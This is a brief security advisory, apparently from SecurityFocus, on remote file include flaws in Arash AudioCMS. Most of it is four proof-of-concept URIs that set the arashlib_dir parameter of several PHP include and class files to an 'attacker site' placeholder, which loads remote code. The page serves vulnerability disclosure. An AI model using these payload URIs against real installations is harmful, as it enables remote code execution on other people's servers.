Arash AudioCMS Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://example.com/arash_lib/include/edit.inc.php?arashlib_dir=attacker site
http://example.com/arash_lib/include/list_features.inc.php?arashlib_dir=attacker site
http://example.com/arash_lib/class/arash_gadmin.class.php?arashlib_dir=attacker site
http://example.com/arash_lib/class/arash_sadmin.class.php?arashlib_dir=attacker site


 

Privacy Statement
Copyright 2010, SecurityFocus